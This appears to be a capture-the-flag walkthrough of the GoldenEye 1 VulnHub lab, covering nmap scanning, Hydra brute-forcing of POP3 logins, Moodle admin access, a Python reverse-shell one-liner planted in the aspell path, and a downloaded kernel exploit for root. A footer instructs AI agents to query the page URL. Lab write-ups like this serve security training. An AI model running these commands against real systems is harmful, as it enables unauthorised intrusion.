# Golden Eye 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

```

```
nmap -p- -Pn 192.168.1.116 
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

```

We can see that there are 2 more unknown port that are on the server.

Let's put the IP on the web browser

![](/files/-M80mU0x_rRluYzvaOvd)

Let's navigate to `/sev-home`

![](/files/-M80n1-lKQk68lc-fl0Y)

Then if we go back to the main page and go to the inspect elements we can see a JavaScript file

![](/files/-M80nl-7jjXW1ZoXJa68)

We can see there is an encrypted password I copied it and paste it at google search bar then we got this surprisingly

![](/files/-M80uy0R3JkQ3SVWsQ1_)

Very obvious, the username is boris and we can login.

![](/files/-M80vHXpHgFia8G86oGq)

We can see that there is pop3 server running.

If we use nmap to enumerate both of the unknown ports 

```
nmap -sV -p 55006,55007 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

```

We know that 55007 is running pop3

## Exploitation

### Hydra

Then we can brute force to get the password of `boris` and `natalya`

```
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

```
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M80xtwCV16Ez8yFniDC)

![](/files/-M80yuU-2utL2baG_mjI)

Got the password! we can now login to the pop3 server

```
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3
```

![](/files/-M80zCW_opDG9CuuKJPm)

Nothing seems to be very interesting here, so we move on to the `natalya`

Doing the same thing as `boris`, we got something pretty interesting here

![](/files/-M80zlTmCSWD6k1SiO9R)

We got a credentials and we need to add the server IP to the /etc/hosts and navigate to `severnaya-station.com/gnocertdir`

After doing that, we can go to the browser and navigate to `severnaya-station.com/gnocertdir`

![](/files/-M811SAadFmusruBd4Ey)

We can login with the credentials he given

Then we can navigate to messages and we can see that the username is `doak`

![](/files/-M8122BvFJdb30jjvy-2)

Now we can take the username doak and brute force using hydra again

```
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M813PD_Bt6fulmj6emi)

We got the credentials, we then can go to back to the pop3 server and login 

![](/files/-M813zpGYh_oMxfLLRoT)

We got the credentials and we go back to the Moodle and login 

![](/files/-M814HhBHFsJGSDHwxoQ)

We then go to the private files and we have a s3cret.txt

![](/files/-M814Sg1yoeCcZSloCWa)

After cat the file out, we got this

![](/files/-M815P3HdLucoP26QQ7r)

We can see that the picture leads to the admin credentials 

We can see that there is a link in the file, if we follow the link,

![](/files/-M815ZENcv3iJ0UxxbsS)

If we download the picture and use strings command to list out all readable content, we will get this

![](/files/-M816K4qLuqLDQg-GAm6)

We can see that there is a base64 encrypted line.

After decode we got

![](/files/-M816UX7ooalZz4Vbc1h)

Let's login to the Moodle using the credentials we just got

![](/files/-M817wXvNDPzY1tJ0qe1)

After playing around, I found out that under site administration, Plugins, and Text Editor, there is a TinyMCE HTML editor

We need to change the Spell engine from Google Spell to PSpellShell

![](/files/-M818Rk730eblkM6kE-E)

Then, we go to the server and System Path, we can see that there is a Path to aspell section

### Reverse Shell

I tried using netcat but it doesn't work so we change the section to Python reverse shell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](/files/-M818aW4kd6el8xq5cw0)

Then we set up a listener at our machine 

```
nc -nlvp 4444
```

Then we can go to blog and add new entries

![](/files/-M81AF7hrJhImW8VjWYU)

After that click the spelling check to get the reverse shell

![](/files/-M81AKydMz7PtmiKxd30)

![](/files/-M81AOgAG-vWp-hI6yEp)

Then we can type a python command 

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Privilege Escalation

If we type `uname -a` , we can see that the kernal is out of date

![](/files/-M81BLKhkAMNVFjVxRdT)

We then can searchsploit the kernal..

![](/files/-M81BSwEeL52L4VB1A7m)

After that we can copy to our directory then I tried to transfer the file to the target machine but `gcc` is not available in the target machine but `cc` is available.

So we need to change something in the exploit

Change the `gcc` to `cc`

![](/files/-M81BmhYGlszbii6Kljc)

![](/files/-M81BrEMymU7sGNdf-Cx)

Then at our machine we can fire up the SimpleHTTPServer using Python

```
python -m SimpleHTTPServer
```

![](/files/-M81C7814oXEr_fhwcfi)

On the target machine navigate to `/tmp` directory and `wget` the file

![](/files/-M81CQpKnEqTqrUGKqUx)

Then we can type 

```
cc 37292.c -o exploit
chmod +x exploit
./exploit
```

![](/files/-M81CiBjFhq3U1hcljId)

Navigate to the `/root` and get the `.flag.txt`

![](/files/-M81CouHn-8k3kQkM9E5)

Then we can navigate to the URL it provided

![](/files/-M81D0ltZFjL8VaKGrMZ)

Congratulation !


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://choochisiang.gitbook.io/report/vulnhub/golden-eye-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.